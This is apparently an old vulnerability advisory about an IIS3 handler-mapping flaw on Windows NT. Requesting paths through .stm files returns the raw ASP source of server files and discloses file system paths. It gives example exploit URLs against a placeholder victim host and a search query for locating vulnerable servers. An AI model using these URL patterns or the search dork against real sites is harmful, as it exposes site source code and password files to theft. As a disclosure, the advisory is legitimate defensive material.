COMMAND
Handler Mapped File Extensions
SYSTEMS AFFECTED
Win NT (with IIS3?)
PROBLEM
'Tanstaafl' posted following. Handler mapped file extensions
reveal system file paths for web directories. If you take a
simple URL, like:
http://www.victim.com/asp/something.stm/asp/Index.asp
you get the raw asp code for the file INDEX.ASP (or anything
else.) The handler returns the raw code of the file without going
through PERL 5 (or the appropriate programming language), these
leaves previously undiscovered problems open for attack. (Although
most of the programs are well protected against buffer-overloads,
these script can be read and the information gained can be used to
"crack" the site.)
A related problem is the ability to transfers the sub-directories,
because the .STM file reads firstly what's in the
http://www.victim.com/ you are able to go from 'd:\main\WWW\' to
any other directory within this hierarchy. Example:
http://www.victim.com/asp/something.stm
Returns "Error processing SSI file 'd\main\WWW\something.stm'"
http://www.victim.com/asp/something.stm/something.asp
Returns the raw "something.asp" code in the directory
'd\main\WWW\', and
http://www.victim.com/asp/something.stm/asp/something.asp
Returns the raw "something.asp" code in the directory
'd\main\WWW\asp\'. This includes any other files you've included
as information handlers, ( Java class files, VB files, etc...)
even encrypted password files. As long as you know the file names
you can access the raw code. (This also means you can download
it.). Additional credit goes to Michal Zalewski. HotBot search
engine can be used to locate vunerable machines:
http://www.search.hotbot.com/hResult.html?MT=Error+processing+SSI+file&SM=phrase&DV=7&RG=.com&DC=100&DE=2&OPs=MDRTP&_v=2&DU=days&SW=web&search.x=37&search.y=14
SOLUTION
The displaying of file system path seems to be limited to IIS3
servers. The installs of IIS4 will only return the path as
provided in the URL.